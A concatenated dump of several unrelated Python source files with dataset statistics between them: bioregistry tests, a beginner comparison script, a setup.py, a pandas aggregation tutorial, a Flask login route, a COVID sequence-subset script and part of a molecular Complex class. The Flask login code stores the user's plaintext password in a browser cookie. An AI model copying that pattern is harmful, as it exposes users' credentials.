self.assertIsNone(bioregistry.get_registry_url('n2t', ...)) # no provider available for N2T registry
metaprefix = 'uniprot'
registry = bioregistry.get_registry(metaprefix)
self.assertIsInstance(registry, Registry)
self.assertEqual(metaprefix, registry.prefix)
self.assertEqual(registry.description, bioregistry.get_registry_description(metaprefix))
homepage = 'https://www.uniprot.org/database/'
self.assertEqual(homepage, registry.homepage)
self.assertEqual(homepage, bioregistry.get_registry_homepage(metaprefix))
name = 'UniProt Cross-ref database'
self.assertEqual(name, registry.name)
self.assertEqual(name, bioregistry.get_registry_name(metaprefix))
example = '0174'
self.assertEqual(example, registry.example)
self.assertEqual(example, bioregistry.get_registry_example(metaprefix))
url = bioregistry.get_registry_url(metaprefix, example)
self.assertEqual('https://www.uniprot.org/database/DB-0174', url)
def test_resolver(self):
"""Test generating resolver URLs."""
# Can't resolve since nope isn't a valid registry
self.assertIsNone(bioregistry.get_registry_resolve_url('nope', 'chebi', '1234'))
# Can't resolve since GO isn't a resolver
self.assertIsNone(bioregistry.get_registry_resolve_url('go', 'chebi', '1234'))
url = bioregistry.get_registry_resolve_url('bioregistry', 'chebi', '1234')
self.assertEqual('https://bioregistry.io/chebi:1234', url)
def test_get_rdf(self):
"""Test conversion to RDF."""
s = metaresource_to_rdf_str('uniprot')
self.assertIsInstance(s, str)
| 43.319149 | 109 | 0.638507 | 423 | 4,072 | 6.004728 | 0.234043 | 0.073622 | 0.138583 | 0.106299 | 0.225197 | 0.179528 | 0.073228 | 0 | 0 | 0 | 0 | 0.009772 | 0.246071 | 4,072 | 93 | 110 | 43.784946 | 0.81759 | 0.123281 | 0 | 0 | 0 | 0 | 0.129105 | 0 | 0 | 0 | 0 | 0 | 0.557377 | 1 | 0.065574 | false | 0 | 0.065574 | 0 | 0.147541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57697b1541d35be66a3cab37aa617e895a535842 | 341 | py | Python | ex038.py | honeyhugh/PythonCurso | e5b8efe04e100ea0b0c0aacde1caf7ae52489f40 | [
"MIT"
] | null | null | null | ex038.py | honeyhugh/PythonCurso | e5b8efe04e100ea0b0c0aacde1caf7ae52489f40 | [
"MIT"
] | null | null | null | ex038.py | honeyhugh/PythonCurso | e5b8efe04e100ea0b0c0aacde1caf7ae52489f40 | [
"MIT"
] | null | null | null | print('Analisador de números')
print('=-=' * 15)
n1 = int(input('Digite o primeiro número: '))
n2 = int(input('Digite o segundo número: '))
if n1 > n2:
print('O número {} é maior que o número {}'.format(n1, n2))
elif n2 > n1:
print('O número {} é maior que o número {}'.format(n2, n1))
else:
print('Os dois valores são iguais.')
| 31 | 63 | 0.624633 | 55 | 341 | 3.872727 | 0.472727 | 0.131455 | 0.131455 | 0.140845 | 0.319249 | 0.319249 | 0.319249 | 0.319249 | 0.319249 | 0 | 0 | 0.043636 | 0.193548 | 341 | 10 | 64 | 34.1 | 0.730909 | 0 | 0 | 0 | 0 | 0 | 0.504399 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
576acce6fb8aee36735ff671a49a541abb4f2890 | 750 | py | Python | setup.py | ksachdeva/symbulate | 409188680c599622140ff6c984c95703173472e8 | [
"MIT"
] | 25 | 2017-04-04T01:55:22.000Z | 2022-03-28T17:57:49.000Z | setup.py | ksachdeva/symbulate | 409188680c599622140ff6c984c95703173472e8 | [
"MIT"
] | 67 | 2017-06-27T23:32:29.000Z | 2022-01-15T19:57:28.000Z | setup.py | ksachdeva/symbulate | 409188680c599622140ff6c984c95703173472e8 | [
"MIT"
] | 21 | 2017-04-04T01:55:22.000Z | 2022-01-11T20:03:52.000Z | from setuptools import setup, find_packages
setup(
name="symbulate",
version="0.5.5",
description="A symbolic algebra for specifying simulations.",
url="https://github.com/dlsun/symbulate",
author="Dennis Sun",
author_email="dsun09@calpoly.edu",
license="GPLv3",
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Education',
'Topic :: Scientific/Engineering :: Mathematics',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Programming Language :: Python :: 3',
],
keywords='probability simulation',
packages=find_packages(),
install_requires=[
'numpy',
'scipy',
'matplotlib'
]
)
| 22.058824 | 75 | 0.612 | 72 | 750 | 6.319444 | 0.847222 | 0.052747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017889 | 0.254667 | 750 | 33 | 76 | 22.727273 | 0.796064 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.029333 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
576cac074c13eb095065c6d2030dffe84a3c2e7c | 725 | py | Python | blind_automation/event/blocker.py | RaphiOriginal/blindAutomation | 47f087be0ef33983cfc372abe09760c9a64f1849 | [
"MIT"
] | 1 | 2020-08-20T19:43:14.000Z | 2020-08-20T19:43:14.000Z | blind_automation/event/blocker.py | RaphiOriginal/blindAutomation | 47f087be0ef33983cfc372abe09760c9a64f1849 | [
"MIT"
] | null | null | null | blind_automation/event/blocker.py | RaphiOriginal/blindAutomation | 47f087be0ef33983cfc372abe09760c9a64f1849 | [
"MIT"
] | null | null | null | from typing import Optional, TypeVar
from .event import EventBlocker
T = TypeVar('T')
class Blocker(EventBlocker):
def __init__(self):
self.__block = False
self.__block_list: [T] = []
def block(self):
self.__block = True
def unblock(self):
self.__block = False
def update(self, task: T):
self.__block_list.append(task)
@property
def last(self) -> Optional[T]:
if len(self.__block_list) > 0:
return self.__block_list.pop()
return None
@property
def blocking(self) -> bool:
return self.__block
def __repr__(self):
return 'Blocker: {blocking: %s, blocked: %s}' % (self.blocking, self.__block_list)
| 21.323529 | 90 | 0.609655 | 88 | 725 | 4.670455 | 0.386364 | 0.19708 | 0.158151 | 0.087591 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001901 | 0.274483 | 725 | 33 | 91 | 21.969697 | 0.779468 | 0 | 0 | 0.173913 | 0 | 0 | 0.051034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.304348 | false | 0 | 0.086957 | 0.086957 | 0.608696 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5777cb4aa061f3c293f389812b1b6779768ca886 | 890 | py | Python | CNN/VGGNET/vgg16_features.py | reddyprasade/Deep-Learning
| 35fea69af72f94f6ad62a0f308de7bd515c27e7a
| [
"MIT"
] | 15 | 2020-01-23T12:01:22.000Z | 2022-03-29T21:07:41.000Z | CNN/VGGNET/vgg16_features.py | reddyprasade/Deep-Learning
| 35fea69af72f94f6ad62a0f308de7bd515c27e7a
| [
"MIT"
] | null | null | null | CNN/VGGNET/vgg16_features.py | reddyprasade/Deep-Learning
| 35fea69af72f94f6ad62a0f308de7bd515c27e7a
| [
"MIT"
] | 10 | 2020-02-12T02:52:04.000Z | 2021-07-04T07:38:39.000Z | import tensorflow as tf
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras import models
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg16 import preprocess_input
import numpy as np
import cv2
# prebuild model with pre-trained weights on imagenet
base_model = VGG16(weights='imagenet', include_top=True)
print (base_model)
for i, layer in enumerate(base_model.layers):
print (i, layer.name, layer.output_shape)
# extract features from block4_pool block
model = models.Model(inputs=base_model.input,
outputs=base_model.get_layer('block4_pool').output)
img_path = 'cat.jpg'
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
# get the features from this block
features = model.predict(x)
print(features)
| 30.689655 | 65 | 0.769663 | 134 | 890 | 4.970149 | 0.477612 | 0.067568 | 0.114114 | 0.093093 | 0.126126 | 0.126126 | 0 | 0 | 0 | 0 | 0 | 0.023529 | 0.140449 | 890 | 28 | 66 | 31.785714 | 0.847059 | 0.139326 | 0 | 0 | 0 | 0 | 0.035471 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.35 | 0 | 0.35 | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
577c1794e9fcb7bdccc6a2a9158ce5b0867f7053 | 4,230 | py | Python | notebook/pandas_agg.py | vhn0912/python-snippets | 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038 | [
"MIT"
] | 174 | 2018-05-30T21:14:50.000Z | 2022-03-25T07:59:37.000Z | notebook/pandas_agg.py | vhn0912/python-snippets | 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038 | [
"MIT"
] | 5 | 2019-08-10T03:22:02.000Z | 2021-07-12T20:31:17.000Z | notebook/pandas_agg.py | vhn0912/python-snippets | 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038 | [
"MIT"
] | 53 | 2018-04-27T05:26:35.000Z | 2022-03-25T07:59:37.000Z | import pandas as pd
import numpy as np
print(pd.__version__)
# 1.0.0
print(pd.DataFrame.agg is pd.DataFrame.aggregate)
# True
df = pd.DataFrame({'A': [0, 1, 2], 'B': [3, 4, 5]})
print(df)
# A B
# 0 0 3
# 1 1 4
# 2 2 5
print(df.agg(['sum', 'mean', 'min', 'max']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
# min 0.0 3.0
# max 2.0 5.0
print(type(df.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg(['sum']))
# A B
# sum 3 12
print(type(df.agg(['sum'])))
# <class 'pandas.core.frame.DataFrame'>
print(df.agg('sum'))
# A 3
# B 12
# dtype: int64
print(type(df.agg('sum')))
# <class 'pandas.core.series.Series'>
print(df.agg({'A': ['sum', 'min', 'max'],
'B': ['mean', 'min', 'max']}))
# A B
# max 2.0 5.0
# mean NaN 4.0
# min 0.0 3.0
# sum 3.0 NaN
print(df.agg({'A': 'sum', 'B': 'mean'}))
# A 3.0
# B 4.0
# dtype: float64
print(df.agg({'A': ['sum'], 'B': ['mean']}))
# A B
# mean NaN 4.0
# sum 3.0 NaN
print(df.agg({'A': ['min', 'max'], 'B': 'mean'}))
# A B
# max 2.0 NaN
# mean NaN 4.0
# min 0.0 NaN
print(df.agg(['sum', 'mean', 'min', 'max'], axis=1))
# sum mean min max
# 0 3.0 1.5 0.0 3.0
# 1 5.0 2.5 1.0 4.0
# 2 7.0 3.5 2.0 5.0
s = df['A']
print(s)
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(s.agg(['sum', 'mean', 'min', 'max']))
# sum 3.0
# mean 1.0
# min 0.0
# max 2.0
# Name: A, dtype: float64
print(type(s.agg(['sum', 'mean', 'min', 'max'])))
# <class 'pandas.core.series.Series'>
print(s.agg(['sum']))
# sum 3
# Name: A, dtype: int64
print(type(s.agg(['sum'])))
# <class 'pandas.core.series.Series'>
print(s.agg('sum'))
# 3
print(type(s.agg('sum')))
# <class 'numpy.int64'>
print(s.agg({'Total': 'sum', 'Average': 'mean', 'Min': 'min', 'Max': 'max'}))
# Total 3.0
# Average 1.0
# Min 0.0
# Max 2.0
# Name: A, dtype: float64
# print(s.agg({'NewLabel_1': ['sum', 'max'], 'NewLabel_2': ['mean', 'min']}))
# SpecificationError: nested renamer is not supported
print(df.agg(['mad', 'amax', 'dtype']))
# A B
# mad 0.666667 0.666667
# amax 2 5
# dtype int64 int64
print(df['A'].mad())
# 0.6666666666666666
print(np.amax(df['A']))
# 2
print(df['A'].dtype)
# int64
# print(df.agg(['xxx']))
# AttributeError: 'xxx' is not a valid function for 'Series' object
# print(df.agg('xxx'))
# AttributeError: 'xxx' is not a valid function for 'DataFrame' object
print(hasattr(pd.DataFrame, '__array__'))
# True
print(hasattr(pd.core.groupby.GroupBy, '__array__'))
# False
print(df.agg([np.sum, max]))
# A B
# sum 3 12
# max 2 5
print(np.sum(df['A']))
# 3
print(max(df['A']))
# 2
print(np.abs(df['A']))
# 0 0
# 1 1
# 2 2
# Name: A, dtype: int64
print(df.agg([np.abs]))
# A B
# absolute absolute
# 0 0 3
# 1 1 4
# 2 2 5
# print(df.agg([np.abs, max]))
# ValueError: cannot combine transform and aggregation operations
def my_func(x):
return min(x) / max(x)
print(df.agg([my_func, lambda x: min(x) / max(x)]))
# A B
# my_func 0.0 0.6
# <lambda> 0.0 0.6
print(df['A'].std())
# 1.0
print(df['A'].std(ddof=0))
# 0.816496580927726
print(df.agg(['std', lambda x: x.std(ddof=0)]))
# A B
# std 1.000000 1.000000
# <lambda> 0.816497 0.816497
print(df.agg('std', ddof=0))
# A 0.816497
# B 0.816497
# dtype: float64
print(df.agg(['std'], ddof=0))
# A B
# std 1.0 1.0
df_str = df.assign(C=['X', 'Y', 'Z'])
print(df_str)
# A B C
# 0 0 3 X
# 1 1 4 Y
# 2 2 5 Z
# df_str['C'].mean()
# TypeError: Could not convert XYZ to numeric
print(df_str.agg(['sum', 'mean']))
# A B C
# sum 3.0 12.0 XYZ
# mean 1.0 4.0 NaN
print(df_str.agg(['mean', 'std']))
# A B
# mean 1.0 4.0
# std 1.0 1.0
print(df_str.agg(['sum', 'min', 'max']))
# A B C
# sum 3 12 XYZ
# min 0 3 X
# max 2 5 Z
print(df_str.select_dtypes(include='number').agg(['sum', 'mean']))
# A B
# sum 3.0 12.0
# mean 1.0 4.0
| 18.883929 | 77 | 0.513002 | 746 | 4,230 | 2.875335 | 0.131367 | 0.091375 | 0.083916 | 0.036364 | 0.49324 | 0.393007 | 0.356177 | 0.296037 | 0.234033 | 0.179021 | 0 | 0.103471 | 0.271158 | 4,230 | 223 | 78 | 18.96861 | 0.59228 | 0.520567 | 0 | 0 | 0 | 0 | 0.136411 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019231 | false | 0 | 0.038462 | 0.019231 | 0.076923 | 0.846154 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
57844212fa28ebcdefb93bfed459606ee05dd39b | 2,950 | py | Python | Prototype_2/web/blueprints/index.py | amal66/Kawm | 3bf442ea1f4b572f4ec840e0ee6ec7d96ae23133 | [
"MIT"
] | null | null | null | Prototype_2/web/blueprints/index.py | amal66/Kawm | 3bf442ea1f4b572f4ec840e0ee6ec7d96ae23133 | [
"MIT"
] | null | null | null | Prototype_2/web/blueprints/index.py | amal66/Kawm | 3bf442ea1f4b572f4ec840e0ee6ec7d96ae23133 | [
"MIT"
] | null | null | null | from flask import Blueprint, render_template,redirect,url_for,request,flash,make_response
from flask import current_app as app
from flask_login import (
LoginManager,
current_user,
login_required,
login_user,
logout_user,
UserMixin,
)
from ..models import User, db
from ..security import hash_string
from datetime import datetime
index_template = Blueprint('index', __name__, template_folder='../templates',static_folder='../static')
# Display home page based on authentication status
@index_template.route('/', methods=["GET","POST"])
def index():
'''
Display home page based on authentication status.
'''
if current_user.is_authenticated:
return render_template('mainpage.html', name=current_user.name, email=current_user.email)
else:
if request.method == 'POST':
email = request.form.get('InputEmail')
password = request.form.get('InputPassword')
remember_me = request.form.get('Remember_me')
user_details = User.query.filter_by(email=email).first()
if user_details:
hashed_password = str(hash_string(password))
if hashed_password == user_details.password:
login_user(user_details)
resp = make_response(render_template('mainpage.html', name=user_details.name, email=user_details.email))
if remember_me == 'on':
COOKIE_TIME_OUT = 60*60*24*7
resp.set_cookie('email',email, max_age=COOKIE_TIME_OUT)
resp.set_cookie('password',password, max_age=COOKIE_TIME_OUT)
resp.set_cookie('rem', 'on', max_age=COOKIE_TIME_OUT)
else:
resp = make_response(redirect('/'))
resp.set_cookie('email', '', expires = datetime.now(), max_age = 0)
resp.set_cookie('password', '', expires = datetime.now(), max_age = 0)
resp.set_cookie('rem', 'off', expires = datetime.now(), max_age = 0)
return resp
else:
if user_details.password == str(hash_string('google')):
flash('Please login with Google login')
elif user_details.password == str(hash_string('facebook')):
flash('Please login with Facebook login')
else:
flash('Incorrect Password')
return redirect(url_for('index.index'))
else:
flash('User not found')
return redirect(url_for('index.index'))
#Tell them no such user found
else:
print(request.cookies)
return render_template('index.html')
| 43.382353 | 124 | 0.557288 | 308 | 2,950 | 5.12013 | 0.311688 | 0.055802 | 0.049461 | 0.039949 | 0.28662 | 0.236525 | 0.142042 | 0.088776 | 0.048193 | 0 | 0 | 0.00516 | 0.343051 | 2,950 | 67 | 125 | 44.029851 | 0.808566 | 0.043051 | 0 | 0.148148 | 0 | 0 | 0.099109 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018519 | false | 0.148148 | 0.111111 | 0 | 0.222222 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
57885b1f14f79ac4171cf51a11ef29a2c3dc1503 | 4,232 | py | Python | utils/make_temporal_subsets.py | davidhwyllie/findNeighbour4 | d42e10711e59e93ebf0e798fbb1598929f662c9c | [
"MIT"
] | null | null | null | utils/make_temporal_subsets.py | davidhwyllie/findNeighbour4 | d42e10711e59e93ebf0e798fbb1598929f662c9c | [
"MIT"
] | 14 | 2021-11-26T14:43:25.000Z | 2022-03-22T00:39:17.000Z | utils/make_temporal_subsets.py | davidhwyllie/findNeighbour4 | d42e10711e59e93ebf0e798fbb1598929f662c9c | [
"MIT"
] | null | null | null | """ generates lists of SARS-CoV-2 samples which occurred before a particular date
Also generates a dictionary of reference compressed sequences
And a subset of these
Together, these can be passed to a ram_persistence object which
can be used instead of an fn3persistence object to test the performance of PCA, or for other
unit testing purposes.
Also useful for investigating how PCA detected the ingress of new strains over time.
Uses public cog metadata downloaded from COG-UK 7/4/2021, saved in
testdata/pca/cog_metadata.csv.gz, and requires access to an fn3persistence object containing the same data.
To run:
pipenv run python3 utils/make_temporal_subsets.py
"""
import os
import pandas as pd
import datetime
import gzip
import pickle
import progressbar
import random
from findn.mongoStore import fn3persistence
from findn.common_utils import ConfigManager
# open connection to existing covid datastore
config_file = os.path.join("demos", "covid", "covid_config_v3.json")
cfm = ConfigManager(config_file)
CONFIG = cfm.read_config()
PERSIST = fn3persistence(dbname=CONFIG["SERVERNAME"], connString=CONFIG["FNPERSISTENCE_CONNSTRING"], debug=CONFIG["DEBUGMODE"])
inputfile = "/data/software/fn4dev/testdata/pca/cog_metadata.csv.gz"
outputdir = "/data/data/pca/subsets" # or wherever
# get samples which are in server
extant_sample_ids = PERSIST.guids()
print("There are {0} samples in the server".format(len(extant_sample_ids)))
# read metadata file into pandas
with gzip.open(inputfile, "rt") as f:
df = pd.read_csv(f)
# we are using the middle part of the cog_id as the sample name as the sample_id; extract this.
sample_ids = df["sequence_name"].to_list()
df["sample_id"] = [x.split("/")[1] for x in sample_ids]
print("There are {0} samples in the COG-UK list".format(len(df.index)))
# what is in the server & not in the list?
server_sample_ids = set(extant_sample_ids)
inputfile_sample_ids = set(df['sample_id'])
missing = server_sample_ids - inputfile_sample_ids
print("Missing samples: n=", len(missing))
missing_df = pd.DataFrame({'missing': list(missing)})
print(missing_df)
missing_df.to_csv("/data/data/inputfasta/missing_meta.csv")
# load a small subset of the reference compressed sequences, for testing purposes
# load the reference compressed sequences
print("Dumping 5,000 sample test set")
storage_dict = {}
sampled = random.sample(df["sample_id"].to_list(), 5000)
bar = progressbar.ProgressBar(max_value=len(sampled))
print("Dumping all samples")
for i, sample_id in enumerate(sampled):
res = PERSIST.refcompressedsequence_read(sample_id)
bar.update(i)
storage_dict[sample_id] = res
bar.finish()
# write out the dictionary
outputfile = "/data/software/fn4dev/testdata/pca/seqs_5000test.pickle"
with open(outputfile, "wb") as f:
pickle.dump(storage_dict, f)
outputfile = "/data/software/fn4dev/testdata/pca/seqs_5000test_ids.pickle"
with open(outputfile, "wb") as f:
pickle.dump(sampled, f)
# load the reference compressed sequences
storage_dict = {}
bar = progressbar.ProgressBar(max_value=len(df.index))
for i, sample_id in enumerate(df["sample_id"]):
res = PERSIST.refcompressedsequence_read(sample_id)
bar.update(i)
storage_dict[sample_id] = res
bar.finish()
# write out the dictionary
outputfile = os.path.join(outputdir, "seqs_20210421.pickle")
with open(outputfile, "wb") as f:
pickle.dump(storage_dict, f)
# construct counts between 1 June 2020 and end March 2021
cnts = df.groupby(["sample_date"]).size()
cnts = cnts[cnts.index >= "2020-06-01"]
cnts = cnts[cnts.index < "2021-04-01"]
cnts = pd.DataFrame(cnts)
cnts.columns = ["count"]
cnts["dow"] = [datetime.date.fromisoformat(item).weekday() for item in cnts.index]
cnts["isodate"] = [datetime.date.fromisoformat(item) for item in cnts.index]
# write samples to consider in the PCA into a series of json files in the output directory
for cutoff_date in cnts.index:
dow = cnts.loc[cutoff_date, "dow"]
df_subset = df[df["sample_date"] < cutoff_date]
sample_ids = df_subset["sample_id"].to_list()
outputfile = os.path.join(outputdir, "{0}-{1}.pickle".format(dow, cutoff_date))
with open(outputfile, "wb") as f:
pickle.dump(sample_ids, f)
print(outputfile)
| 36.8 | 127 | 0.756144 | 647 | 4,232 | 4.829985 | 0.330757 | 0.03072 | 0.03584 | 0.0256 | 0.30272 | 0.2304 | 0.17536 | 0.15872 | 0.11872 | 0.10624 | 0 | 0.019068 | 0.132561 | 4,232 | 114 | 128 | 37.122807 | 0.832198 | 0.301276 | 0 | 0.228571 | 1 | 0 | 0.208787 | 0.085831 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.128571 | 0 | 0.128571 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57978560a0242c56700cc234e8aab484133ef169 | 11,740 | py | Python | nanome/api/structure/complex.py | nanome-ai/nanome | 7777a782168fe4e68f58c42f01cff9e66f3675aa | [
"MIT"
] | 1 | 2020-04-10T09:47:54.000Z | 2020-04-10T09:47:54.000Z | nanome/api/structure/complex.py | nanome-ai/nanome | 7777a782168fe4e68f58c42f01cff9e66f3675aa | [
"MIT"
] | 10 | 2019-05-30T18:29:10.000Z | 2020-02-15T02:16:42.000Z | nanome/api/structure/complex.py | nanome-ai/nanome | 7777a782168fe4e68f58c42f01cff9e66f3675aa | [
"MIT"
] | 2 | 2020-02-04T02:56:21.000Z | 2020-04-25T20:05:16.000Z | from nanome._internal._structure._complex import _Complex
from nanome._internal import _PluginInstance
from nanome._internal._network import PluginNetwork
from nanome._internal._network._commands._callbacks import _Messages
from nanome.util import Matrix, Logs
from .io import ComplexIO
from . import Base
class Complex(_Complex, Base):
"""
| Represents a Complex that contains molecules.
"""
io = ComplexIO()
def __init__(self):
super(Complex, self).__init__()
self._rendering = Complex.Rendering(self)
self._molecular = Complex.Molecular(self)
self._transform = Complex.Transform(self)
self.io = ComplexIO(self)
def add_molecule(self, molecule):
"""
| Add a molecule to this complex
:param molecule: Molecule to add to the chain
:type molecule: :class:`~nanome.structure.Molecule`
"""
molecule.index = -1
self._add_molecule(molecule)
def remove_molecule(self, molecule):
"""
| Remove a molecule from this complex
:param molecule: Molecule to remove from the chain
:type molecule: :class:`~nanome.structure.Molecule`
"""
molecule.index = -1
self._remove_molecule(molecule)
# region Generators
@property
def molecules(self):
"""
| The list of molecules within this complex
"""
for molecule in self._molecules:
yield molecule
@molecules.setter
def molecules(self, molecule_list):
self._molecules = molecule_list
@property
def chains(self):
"""
| The list of chains within this complex
"""
for molecule in self.molecules:
for chain in molecule.chains:
yield chain
@property
def residues(self):
"""
| The list of residues within this complex
"""
for chain in self.chains:
for residue in chain.residues:
yield residue
@property
def atoms(self):
"""
| The list of atoms within this complex
"""
for residue in self.residues:
for atom in residue.atoms:
yield atom
@property
def bonds(self):
"""
| The list of bonds within this complex
"""
for residue in self.residues:
for bond in residue.bonds:
yield bond
# endregion
# region all fields
@property
def boxed(self):
"""
| Represents if this complex is boxed/bordered in Nanome.
:type: :class:`bool`
"""
return self._boxed
@boxed.setter
def boxed(self, value):
self._boxed = value
@property
def locked(self):
"""
| Represents if this complex is locked and unmovable in Nanome.
:type: :class:`bool`
"""
return self._locked
@locked.setter
def locked(self, value):
self._locked = value
if (value):
self._boxed = True
@property
def visible(self):
"""
| Represents if this complex is visible in Nanome.
:type: :class:`bool`
"""
return self._visible
@visible.setter
def visible(self, value):
self._visible = value
@property
def computing(self):
return self._computing
@computing.setter
def computing(self, value):
self._computing = value
@property
def current_frame(self):
"""
| Represents the current animation frame the complex is in.
:type: :class:`int`
"""
return self._current_frame
@current_frame.setter
def current_frame(self, value):
value = max(0, min(value, len(self._molecules) - 1))
self._current_frame = value
def set_current_frame(self, value):
self.current_frame = value
# returns true if the complex is selected on nanome.
def get_selected(self):
return self._selected
def get_all_selected(self):
for atom in self.atoms:
if not atom.selected:
return False
return True
def set_all_selected(self, value):
for atom in self.atoms:
atom.selected = value
def set_surface_needs_redraw(self):
self._surface_dirty = True
@property
def box_label(self):
"""
| Represents the label on the box surrounding the complex
:type: :class:`str`
"""
return self._box_label
@box_label.setter
def box_label(self, value):
self._box_label = value
@property
def name(self):
"""
| Represents the name of the complex
:type: :class:`str`
"""
return self._name
@name.setter
def name(self, value):
if type(value) is not str:
value = str(value)
self._name = value
@property
def index_tag(self):
return self._index_tag
@index_tag.setter
def index_tag(self, value):
self._index_tag = value
@property
def split_tag(self):
return self._split_tag
@split_tag.setter
def split_tag(self, value):
self._split_tag = value
@property
def full_name(self):
"""
| Represents the full name of the complex with its tags and name
:type: :class:`str`
"""
fullname = self._name
has_tag = False
if self._index_tag > 0:
fullname = fullname + " {" + str(self._index_tag)
has_tag = True
if self._split_tag is not None and len(self._split_tag) > 0:
if has_tag:
fullname = fullname + "-" + self._split_tag
else:
fullname = fullname + " {" + self._split_tag
has_tag = True
if has_tag:
fullname = fullname + "}"
return fullname
@full_name.setter
def full_name(self, value):
self._name = value
self._index_tag = 0
self._split_tag = ''
@property
def position(self):
"""
| Position of the complex
:type: :class:`~nanome.util.Vector3`
"""
return self._position
@position.setter
def position(self, value):
self._position = value
@property
def rotation(self):
"""
| Rotation of the complex
:type: :class:`~nanome.util.Quaternion`
"""
return self._rotation
@rotation.setter
def rotation(self, value):
self._rotation = value
@property
def remarks(self):
"""
| remarks section of the complex file
:type: :class: dict
"""
return self._remarks
@remarks.setter
def remarks(self, value):
self._remarks = value
def get_workspace_to_complex_matrix(self):
return self.get_complex_to_workspace_matrix().get_inverse()
def get_complex_to_workspace_matrix(self):
return Matrix.compose_transformation_matrix(self._position, self._rotation)
# endregion
def convert_to_conformers(self, force_conformers=None):
return self._convert_to_conformers(force_conformers)
def convert_to_frames(self):
return self._convert_to_frames()
def register_complex_updated_callback(self, callback):
self._complex_updated_callback = callback
_PluginInstance._hook_complex_updated(self.index, callback)
PluginNetwork._send(_Messages.hook_complex_updated, self.index, False)
def register_selection_changed_callback(self, callback):
self._selection_changed_callback = callback
_PluginInstance._hook_selection_changed(self.index, callback)
PluginNetwork._send(_Messages.hook_selection_changed, self.index, False)
@staticmethod
def align_origins(target_complex, *other_complexes):
for complex in other_complexes:
complex.position = target_complex.position.get_copy()
complex.rotation = target_complex.rotation.get_copy()
# region deprecated
@property
@Logs.deprecated()
def rendering(self):
return self._rendering
@property
@Logs.deprecated()
def molecular(self):
return self._molecular
@property
@Logs.deprecated()
def transform(self):
return self._transform
class Rendering(object):
def __init__(self, parent):
self.parent = parent
@property
def boxed(self):
return self.parent._boxed
@boxed.setter
def boxed(self, value):
self.parent.boxed = value
@property
def locked(self):
return self.parent.locked
@locked.setter
def locked(self, value):
self.parent.locked = value
if (value):
self.parent.boxed = True
@property
def visible(self):
return self.parent.visible
@visible.setter
def visible(self, value):
self.parent.visible = value
@property
def computing(self):
return self.parent.computing
@computing.setter
def computing(self, value):
self.parent.computing = value
@property
def current_frame(self):
return self.parent.current_frame
@current_frame.setter
